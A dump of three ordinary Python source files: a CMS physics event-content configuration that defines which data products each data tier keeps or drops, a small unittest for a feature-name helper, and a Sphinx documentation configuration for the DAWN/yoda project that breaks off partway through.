GENRAWEventContent.outputCommands.extend(RecoGenMETFEVT.outputCommands)
GENRAWEventContent.outputCommands.extend(RecoGenJetsFEVT.outputCommands)
GENRAWEventContent.outputCommands.extend(MEtoEDMConverterFEVT.outputCommands)
GENRAWEventContent.outputCommands.extend(IOMCRAW.outputCommands)
GENRAWEventContent.outputCommands.extend(DigiToRawFEVT.outputCommands)
GENRAWEventContent.outputCommands.extend(CommonEventContent.outputCommands)
PREMIXEventContent.outputCommands.extend(SimGeneralRAW.outputCommands)
PREMIXEventContent.outputCommands.extend(IOMCRAW.outputCommands)
PREMIXEventContent.outputCommands.extend(CommonEventContent.outputCommands)
PREMIXEventContent.outputCommands.extend(SimTrackerPREMIX.outputCommands)
PREMIXEventContent.outputCommands.extend(SimCalorimetryPREMIX.outputCommands)
PREMIXEventContent.outputCommands.extend(SimFastTimingPREMIX.outputCommands)
PREMIXEventContent.outputCommands.extend(SimMuonPREMIX.outputCommands)
PREMIXEventContent.outputCommands.extend(SimGeneralPREMIX.outputCommands)
fastSim.toModify(PREMIXEventContent, outputCommands = PREMIXEventContent.outputCommands+fastSimEC.extraPremixContent)
PREMIXRAWEventContent.outputCommands.extend(RAWSIMEventContent.outputCommands)
PREMIXRAWEventContent.outputCommands.append('keep CrossingFramePlaybackInfoNew_*_*_*')
PREMIXRAWEventContent.outputCommands.append('drop CrossingFramePlaybackInfoNew_mix_*_*')
PREMIXRAWEventContent.outputCommands.append('keep *_*_MergedTrackTruth_*')
PREMIXRAWEventContent.outputCommands.append('keep *_*_StripDigiSimLink_*')
PREMIXRAWEventContent.outputCommands.append('keep *_*_PixelDigiSimLink_*')
PREMIXRAWEventContent.outputCommands.append('keep *_*_MuonCSCStripDigiSimLinks_*')
PREMIXRAWEventContent.outputCommands.append('keep *_*_MuonCSCWireDigiSimLinks_*')
PREMIXRAWEventContent.outputCommands.append('keep *_*_RPCDigiSimLink_*')
PREMIXRAWEventContent.outputCommands.append('keep DTLayerIdDTDigiSimLinkMuonDigiCollection_*_*_*')
fastSim.toModify(PREMIXEventContent, outputCommands = PREMIXEventContent.outputCommands+fastSimEC.extraPremixContent)
REPACKRAWSIMEventContent.outputCommands.extend(REPACKRAWEventContent.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(SimG4CoreRAW.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(SimTrackerRAW.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(SimMuonRAW.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(SimCalorimetryRAW.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(SimFastTimingRAW.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(SimGeneralRAW.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(GeneratorInterfaceRAW.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(RecoGenJetsFEVT.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(RecoGenMETFEVT.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(DigiToRawFEVT.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(MEtoEDMConverterFEVT.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(IOMCRAW.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(CommonEventContent.outputCommands)
RECOSIMEventContent.outputCommands.extend(RECOEventContent.outputCommands)
RECOSIMEventContent.outputCommands.extend(GeneratorInterfaceRECO.outputCommands)
RECOSIMEventContent.outputCommands.extend(RecoGenMETRECO.outputCommands)
RECOSIMEventContent.outputCommands.extend(RecoGenJetsRECO.outputCommands)
RECOSIMEventContent.outputCommands.extend(SimG4CoreRECO.outputCommands)
RECOSIMEventContent.outputCommands.extend(SimTrackerRECO.outputCommands)
RECOSIMEventContent.outputCommands.extend(SimMuonRECO.outputCommands)
RECOSIMEventContent.outputCommands.extend(SimCalorimetryRECO.outputCommands)
RECOSIMEventContent.outputCommands.extend(SimFastTimingRECO.outputCommands)
RECOSIMEventContent.outputCommands.extend(SimGeneralRECO.outputCommands)
RECOSIMEventContent.outputCommands.extend(MEtoEDMConverterRECO.outputCommands)
AODSIMEventContent.outputCommands.extend(AODEventContent.outputCommands)
AODSIMEventContent.outputCommands.extend(GeneratorInterfaceAOD.outputCommands)
AODSIMEventContent.outputCommands.extend(SimG4CoreAOD.outputCommands)
AODSIMEventContent.outputCommands.extend(SimTrackerAOD.outputCommands)
AODSIMEventContent.outputCommands.extend(SimMuonAOD.outputCommands)
AODSIMEventContent.outputCommands.extend(SimCalorimetryAOD.outputCommands)
AODSIMEventContent.outputCommands.extend(SimFastTimingAOD.outputCommands)
AODSIMEventContent.outputCommands.extend(RecoGenJetsAOD.outputCommands)
AODSIMEventContent.outputCommands.extend(RecoGenMETAOD.outputCommands)
AODSIMEventContent.outputCommands.extend(SimGeneralAOD.outputCommands)
AODSIMEventContent.outputCommands.extend(MEtoEDMConverterAOD.outputCommands)
RAWRECOSIMHLTEventContent.outputCommands.extend(RAWRECOEventContent.outputCommands)
RAWRECOSIMHLTEventContent.outputCommands.extend(GeneratorInterfaceRECO.outputCommands)
RAWRECOSIMHLTEventContent.outputCommands.extend(RecoGenMETRECO.outputCommands)
RAWRECOSIMHLTEventContent.outputCommands.extend(RecoGenJetsRECO.outputCommands)
RAWRECOSIMHLTEventContent.outputCommands.extend(SimG4CoreRECO.outputCommands)
RAWRECOSIMHLTEventContent.outputCommands.extend(SimTrackerRECO.outputCommands)
RAWRECOSIMHLTEventContent.outputCommands.extend(SimMuonRECO.outputCommands)
RAWRECOSIMHLTEventContent.outputCommands.extend(SimCalorimetryRECO.outputCommands)
RAWRECOSIMHLTEventContent.outputCommands.extend(SimFastTimingRECO.outputCommands)
RAWRECOSIMHLTEventContent.outputCommands.extend(SimGeneralRECO.outputCommands)
RAWRECOSIMHLTEventContent.outputCommands.extend(MEtoEDMConverterRECO.outputCommands)
RAWRECOSIMHLTEventContent.outputCommands.extend(HLTDebugRAW.outputCommands)
RAWRECODEBUGHLTEventContent.outputCommands.extend(RAWRECOSIMHLTEventContent.outputCommands)
RAWRECODEBUGHLTEventContent.outputCommands.extend(SimGeneralFEVTDEBUG.outputCommands)
RAWRECODEBUGHLTEventContent.outputCommands.extend(SimTrackerDEBUG.outputCommands)
FEVTEventContent.outputCommands.extend(RAWEventContent.outputCommands)
FEVTEventContent.outputCommands.extend(RecoLocalTrackerRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoLocalMuonRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoLocalCaloRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoEcalRECO.outputCommands)
FEVTEventContent.outputCommands.extend(TrackingToolsRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoTrackerRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoJetsRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoMETRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoMuonRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoBTauRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoBTagRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoTauTagRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoVertexRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoEgammaRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoPixelVertexingRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoParticleFlowRECO.outputCommands)
FEVTEventContent.outputCommands.extend(BeamSpotRECO.outputCommands)
FEVTEventContent.outputCommands.extend(L1TriggerRECO.outputCommands)
FEVTEventContent.outputCommands.extend(HLTriggerRECO.outputCommands)
FEVTEventContent.outputCommands.extend(MEtoEDMConverterRECO.outputCommands)
FEVTEventContent.outputCommands.extend(EvtScalersRECO.outputCommands)
FEVTEventContent.outputCommands.extend(OnlineMetaDataContent.outputCommands)
FEVTEventContent.outputCommands.extend(TcdsEventContent.outputCommands)
FEVTEventContent.outputCommands.extend(CommonEventContent.outputCommands)
FEVTEventContent.outputCommands.extend(EITopPAGEventContent.outputCommands)
ctpps_2016.toModify(FEVTEventContent, outputCommands = FEVTEventContent.outputCommands + RecoCTPPSFEVT.outputCommands)
FEVTHLTALLEventContent.outputCommands.extend(FEVTEventContent.outputCommands)
FEVTHLTALLEventContent.outputCommands.append('keep *_*_*_HLT')
FEVTSIMEventContent.outputCommands.extend(RAWEventContent.outputCommands)
FEVTSIMEventContent.outputCommands.extend(SimG4CoreRAW.outputCommands)
FEVTSIMEventContent.outputCommands.extend(SimTrackerRAW.outputCommands)
FEVTSIMEventContent.outputCommands.extend(SimMuonRAW.outputCommands)
FEVTSIMEventContent.outputCommands.extend(SimCalorimetryRAW.outputCommands)
FEVTSIMEventContent.outputCommands.extend(SimFastTimingRAW.outputCommands)
FEVTSIMEventContent.outputCommands.extend(SimGeneralRAW.outputCommands)
FEVTSIMEventContent.outputCommands.extend(GeneratorInterfaceRAW.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoGenJetsFEVT.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoGenMETFEVT.outputCommands)
FEVTSIMEventContent.outputCommands.extend(DigiToRawFEVT.outputCommands)
FEVTSIMEventContent.outputCommands.extend(MEtoEDMConverterFEVT.outputCommands)
FEVTSIMEventContent.outputCommands.extend(IOMCRAW.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoLocalTrackerRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoLocalMuonRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoLocalCaloRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoEcalRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(TrackingToolsRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoTrackerRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoJetsRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoMETRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoMuonRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoBTauRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoBTagRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoTauTagRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoVertexRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoEgammaRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoPixelVertexingRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoParticleFlowRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(BeamSpotRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(L1TriggerRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(HLTriggerRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(MEtoEDMConverterRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(GeneratorInterfaceRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoGenMETRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoGenJetsRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(SimG4CoreRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(SimTrackerRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(SimMuonRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(SimCalorimetryRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(SimFastTimingRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(SimGeneralRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(MEtoEDMConverterRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(EvtScalersRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(CommonEventContent.outputCommands)
FEVTSIMEventContent.outputCommands.extend(EITopPAGEventContent.outputCommands)
FEVTSIMEventContent.outputCommands.extend(OnlineMetaDataContent.outputCommands)
FEVTSIMEventContent.outputCommands.extend(TcdsEventContent.outputCommands)
RAWDEBUGEventContent.outputCommands.extend(RAWSIMEventContent.outputCommands)
RAWDEBUGEventContent.outputCommands.extend(SimTrackerDEBUG.outputCommands)
RAWDEBUGEventContent.outputCommands.extend(SimGeneralFEVTDEBUG.outputCommands)
RAWDEBUGEventContent.outputCommands.extend(L1TriggerRAWDEBUG.outputCommands)
RAWDEBUGHLTEventContent.outputCommands.extend(RAWDEBUGEventContent.outputCommands)
RAWDEBUGHLTEventContent.outputCommands.extend(HLTDebugRAW.outputCommands)
FEVTDEBUGEventContent.outputCommands.extend(FEVTSIMEventContent.outputCommands)
FEVTDEBUGEventContent.outputCommands.extend(L1TriggerFEVTDEBUG.outputCommands)
FEVTDEBUGEventContent.outputCommands.extend(SimGeneralFEVTDEBUG.outputCommands)
FEVTDEBUGEventContent.outputCommands.extend(SimTrackerFEVTDEBUG.outputCommands)
FEVTDEBUGEventContent.outputCommands.extend(SimMuonFEVTDEBUG.outputCommands)
FEVTDEBUGEventContent.outputCommands.extend(SimCalorimetryFEVTDEBUG.outputCommands)
FEVTDEBUGEventContent.outputCommands.extend(SimFastTimingFEVTDEBUG.outputCommands)
FEVTDEBUGHLTEventContent.outputCommands.extend(FEVTDEBUGEventContent.outputCommands)
FEVTDEBUGHLTEventContent.outputCommands.extend(HLTDebugFEVT.outputCommands)
FEVTDEBUGHLTEventContent.outputCommands.append('keep *_*_MergedTrackTruth_*')
FEVTDEBUGHLTEventContent.outputCommands.append('keep *_*_StripDigiSimLink_*')
FEVTDEBUGHLTEventContent.outputCommands.append('keep *_*_PixelDigiSimLink_*')
RECODEBUGEventContent.outputCommands.extend(RECOSIMEventContent.outputCommands)
RECODEBUGEventContent.outputCommands.extend(SimGeneralFEVTDEBUG.outputCommands)
RECODEBUGEventContent.outputCommands.extend(SimTrackerDEBUG.outputCommands)
from Configuration.ProcessModifiers.premix_stage2_cff import premix_stage2
from Configuration.Eras.Modifier_phase2_tracker_cff import phase2_tracker
(premix_stage2 & phase2_tracker).toModify(FEVTDEBUGHLTEventContent, outputCommands = FEVTDEBUGHLTEventContent.outputCommands+[
'keep *_*_Phase2OTDigiSimLink_*'
])
from Configuration.Eras.Modifier_phase2_muon_cff import phase2_muon
(premix_stage2 & phase2_muon).toModify(FEVTDEBUGHLTEventContent, outputCommands = FEVTDEBUGHLTEventContent.outputCommands+[
'keep *_*_GEMDigiSimLink_*',
'keep *_*_GEMStripDigiSimLink_*',
'keep *_*_ME0DigiSimLink_*',
'keep *_*_ME0StripDigiSimLink_*',
])
REPACKRAWSIMEventContent.outputCommands.extend(['drop FEDRawDataCollection_source_*_*',
'drop FEDRawDataCollection_rawDataCollector_*_*'])
REPACKRAWEventContent.outputCommands.extend(['drop FEDRawDataCollection_source_*_*',
'drop FEDRawDataCollection_rawDataCollector_*_*'])
# Drop (on input) the products of the modules in Configuration.StandardSequence.Generator_cff (fixGenInfo) so they can be regenerated
REGENEventContent = cms.PSet(
inputCommands=cms.untracked.vstring(
'keep *',
'drop *_genParticles_*_*',
'drop *_genParticlesForJets_*_*',
'drop *_kt4GenJets_*_*',
'drop *_kt6GenJets_*_*',
'drop *_iterativeCone5GenJets_*_*',
'drop *_ak4GenJets_*_*',
'drop *_ak7GenJets_*_*',
'drop *_ak8GenJets_*_*',
'drop *_ak4GenJetsNoNu_*_*',
'drop *_ak8GenJetsNoNu_*_*',
'drop *_genCandidatesForMET_*_*',
'drop *_genParticlesForMETAllVisible_*_*',
'drop *_genMetCalo_*_*',
'drop *_genMetCaloAndNonPrompt_*_*',
'drop *_genMetTrue_*_*',
'drop *_genMetIC5GenJs_*_*'
)
)
def SwapKeepAndDrop(l):
r=[]
for item in l:
if 'keep ' in item:
r.append(item.replace('keep ','drop '))
elif 'drop ' in item:
r.append(item.replace('drop ','keep '))
return r
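# Illustrative note (not from the original configuration): SwapKeepAndDrop
# simply inverts the keep/drop prefixes of a list of output commands, e.g.
#   SwapKeepAndDrop(['keep *_genParticles_*_*', 'drop *'])
#   -> ['drop *_genParticles_*_*', 'keep *']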
RESIMEventContent = cms.PSet(
inputCommands=cms.untracked.vstring('drop *')
)
RESIMEventContent.inputCommands.extend(IOMCRAW.outputCommands)
RESIMEventContent.inputCommands.extend(GeneratorInterfaceRAW.outputCommands)
#RESIMEventContent.inputCommands.extend(SwapKeepAndDrop(SimG4CoreRAW.outputCommands))
#RESIMEventContent.inputCommands.extend(SwapKeepAndDrop(GeneratorInterfaceRAW.outputCommands))
REDIGIEventContent = cms.PSet(
inputCommands=cms.untracked.vstring('drop *')
)
REDIGIEventContent.inputCommands.extend(SimG4CoreRAW.outputCommands)
REDIGIEventContent.inputCommands.extend(IOMCRAW.outputCommands)
REDIGIEventContent.inputCommands.extend(GeneratorInterfaceRAW.outputCommands)
REDIGIEventContent.inputCommands.append('drop *_randomEngineStateProducer_*_*')
########### and mini AOD
#
# MiniAOD is a bit special: the files tend to be so small that letting
# ROOT automatically determine when to flush is a surprisingly big overhead.
#
MINIAODEventContent= cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
eventAutoFlushCompressedSize=cms.untracked.int32(-900),
compressionAlgorithm=cms.untracked.string("LZMA"),
compressionLevel=cms.untracked.int32(4)
)
MINIAODSIMEventContent= cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
eventAutoFlushCompressedSize=cms.untracked.int32(-900),
compressionAlgorithm=cms.untracked.string("LZMA"),
compressionLevel=cms.untracked.int32(4)
)
MINIGENEventContent= cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
eventAutoFlushCompressedSize=cms.untracked.int32(15*1024*1024),
compressionAlgorithm=cms.untracked.string("LZMA"),
compressionLevel=cms.untracked.int32(4)
)
from PhysicsTools.PatAlgos.slimming.slimming_cff import MicroEventContent,MicroEventContentMC,MicroEventContentGEN
MINIAODEventContent.outputCommands.extend(MicroEventContent.outputCommands)
MINIAODSIMEventContent.outputCommands.extend(MicroEventContentMC.outputCommands)
MINIGENEventContent.outputCommands.extend(MicroEventContentGEN.outputCommands)
#### RAW+miniAOD
RAWMINIAODEventContent= cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
eventAutoFlushCompressedSize=cms.untracked.int32(20*1024*1024),
compressionAlgorithm=cms.untracked.string("LZMA"),
compressionLevel=cms.untracked.int32(4)
)
RAWMINIAODSIMEventContent= cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
eventAutoFlushCompressedSize=cms.untracked.int32(20*1024*1024),
compressionAlgorithm=cms.untracked.string("LZMA"),
compressionLevel=cms.untracked.int32(4)
)
RAWMINIAODEventContent.outputCommands.extend(MicroEventContent.outputCommands)
RAWMINIAODEventContent.outputCommands.extend(L1TriggerRAW.outputCommands)
RAWMINIAODEventContent.outputCommands.extend(HLTriggerRAW.outputCommands)
RAWMINIAODSIMEventContent.outputCommands.extend(MicroEventContentMC.outputCommands)
RAWMINIAODSIMEventContent.outputCommands.extend(SimG4CoreHLTAODSIM.outputCommands)
RAWMINIAODSIMEventContent.outputCommands.extend(L1TriggerRAW.outputCommands)
RAWMINIAODSIMEventContent.outputCommands.extend(HLTriggerRAW.outputCommands)
RAWMINIAODEventContent.outputCommands.extend(cms.untracked.vstring(
'keep FEDRawDataCollection_rawDataCollector_*_*',
'keep FEDRawDataCollection_source_*_*'
))
RAWMINIAODSIMEventContent.outputCommands.extend(cms.untracked.vstring(
'keep FEDRawDataCollection_rawDataCollector_*_*',
'keep FEDRawDataCollection_source_*_*'
))
#
#
# RAWAODSIM Data Tier definition
# Meant as a means to temporarily hold the RAW + AODSIM information so that
# the L1+HLT can be rerun at a later time.
#
RAWAODSIMEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
eventAutoFlushCompressedSize=cms.untracked.int32(20*1024*1024),
compressionAlgorithm=cms.untracked.string("LZMA"),
compressionLevel=cms.untracked.int32(4)
)
RAWAODSIMEventContent.outputCommands.extend(AODSIMEventContent.outputCommands)
RAWAODSIMEventContent.outputCommands.extend(L1TriggerRAW.outputCommands)
RAWAODSIMEventContent.outputCommands.extend(HLTriggerRAW.outputCommands)
RAWAODSIMEventContent.outputCommands.extend(SimG4CoreHLTAODSIM.outputCommands)
# In FastSim, the normal digis are EDAliases of the sim digis;
# drop the sim digis to avoid complaints from the output module about duplicated branches
for _entry in [FEVTDEBUGHLTEventContent,FEVTDEBUGEventContent,RECOSIMEventContent,AODSIMEventContent,RAWAODSIMEventContent]:
fastSim.toModify(_entry, outputCommands = _entry.outputCommands + fastSimEC.dropSimDigis)
for _entry in [MINIAODEventContent, MINIAODSIMEventContent]:
fastSim.toModify(_entry, outputCommands = _entry.outputCommands + fastSimEC.dropPatTrigger)
for _entry in [FEVTDEBUGEventContent,FEVTDEBUGHLTEventContent,FEVTEventContent]:
phase2_tracker.toModify(_entry, outputCommands = _entry.outputCommands + [
'keep Phase2TrackerDigiedmDetSetVector_mix_*_*',
'keep *_TTClustersFromPhase2TrackerDigis_*_*',
'keep *_TTStubsFromPhase2TrackerDigis_*_*'
])
from Configuration.Eras.Modifier_run2_GEM_2017_cff import run2_GEM_2017
from Configuration.Eras.Modifier_run3_GEM_cff import run3_GEM
from Configuration.Eras.Modifier_phase2_muon_cff import phase2_muon
from Configuration.Eras.Modifier_pp_on_AA_2018_cff import pp_on_AA_2018
for _entry in [FEVTDEBUGEventContent,FEVTDEBUGHLTEventContent,FEVTEventContent]:
run2_GEM_2017.toModify(_entry, outputCommands = _entry.outputCommands + ['keep *_muonGEMDigis_*_*'])
run3_GEM.toModify(_entry, outputCommands = _entry.outputCommands + ['keep *_muonGEMDigis_*_*'])
phase2_muon.toModify(_entry, outputCommands = _entry.outputCommands + ['keep *_muonGEMDigis_*_*'])
pp_on_AA_2018.toModify(_entry, outputCommands = _entry.outputCommands + ['keep FEDRawDataCollection_rawDataRepacker_*_*'])
from RecoLocalFastTime.Configuration.RecoLocalFastTime_EventContent_cff import RecoLocalFastTimeFEVT, RecoLocalFastTimeRECO, RecoLocalFastTimeAOD
from Configuration.Eras.Modifier_phase2_timing_layer_cff import phase2_timing_layer
def _addOutputCommands(mod, newCommands):
phase2_timing_layer.toModify(mod, outputCommands = mod.outputCommands + newCommands.outputCommands)
_addOutputCommands(FEVTDEBUGEventContent,RecoLocalFastTimeFEVT)
_addOutputCommands(FEVTDEBUGHLTEventContent,RecoLocalFastTimeFEVT)
_addOutputCommands(FEVTEventContent,RecoLocalFastTimeFEVT)
_addOutputCommands(RECOSIMEventContent,RecoLocalFastTimeRECO)
_addOutputCommands(AODSIMEventContent,RecoLocalFastTimeAOD)
from RecoMTD.Configuration.RecoMTD_EventContent_cff import RecoMTDFEVT, RecoMTDRECO, RecoMTDAOD
_addOutputCommands(FEVTDEBUGEventContent,RecoMTDFEVT)
_addOutputCommands(FEVTDEBUGHLTEventContent,RecoMTDFEVT)
_addOutputCommands(FEVTEventContent,RecoMTDFEVT)
_addOutputCommands(RECOSIMEventContent,RecoMTDRECO)
_addOutputCommands(AODSIMEventContent,RecoMTDAOD)
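#
# Usage sketch (illustrative only, not part of this configuration fragment):
# these PSets are typically consumed by copying their outputCommands into an
# output module. Assuming this file is Configuration.EventContent.EventContent_cff:
#
#   import FWCore.ParameterSet.Config as cms
#   from Configuration.EventContent.EventContent_cff import RECOSIMEventContent
#   out = cms.OutputModule("PoolOutputModule",
#       fileName = cms.untracked.string('output.root'),
#       outputCommands = RECOSIMEventContent.outputCommands
#   )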
|
py | 7dfa1fc52977f0834ffac0629ebc18e3b843f785 | import unittest
from source.code.utils import generate_features_names
class TestUtils(unittest.TestCase):
def test_generate_features_names(self):
        num_features = ['width', 'height', 'age']
bin_features = ['gender']
cat_features = {'marital_status': 5, 'home_type': 3}
res = generate_features_names(bin_features, cat_features, num_features)
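        # 12 = 3 numeric + 1 binary + (5 + 3) expanded categorical columns (presumed one-hot style encoding)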
self.assertEqual(12, len(res), 'Something is wrong!!!')
|
py | 7dfa214002680b97826398fc37f9270dfb27cbab | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
##===-----------------------------------------------------------------------------*- Python -*-===##
## _
## | |
## __| | __ ___ ___ ___
## / _` |/ _` \ \ /\ / / '_ |
## | (_| | (_| |\ V V /| | | |
## \__,_|\__,_| \_/\_/ |_| |_| - Compiler Toolchain
##
##
## This file is distributed under the MIT License (MIT).
## See LICENSE.txt for details.
##
##===------------------------------------------------------------------------------------------===##
# DAWN documentation build configuration file, created by
# sphinx-quickstart on Sat Sep 27 13:56:47 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('_extension'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['cmake', 'edit_on_github']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'yoda'
copyright = '2017, ETH Zurich and MeteoSwiss'
author = 'Fabian Thuering, Carlos Osuna and Tobias Wicky'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = ""
# The full version, including alpha/beta/rc tags.
release = ""
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# Enable numfig
numfig = True
# -- Options for HTML output ----------------------------------------------
html_theme = "sphinx_rtd_theme"
html_theme_options = {
'collapse_navigation': False,
'display_version': True,
'navigation_depth': 3,
}
html_theme_path = ["_themes", ]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
#   'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
#   'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'yodadoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
'papersize': 'a4paper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '\DeclareUnicodeCharacter{00A0}{}',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
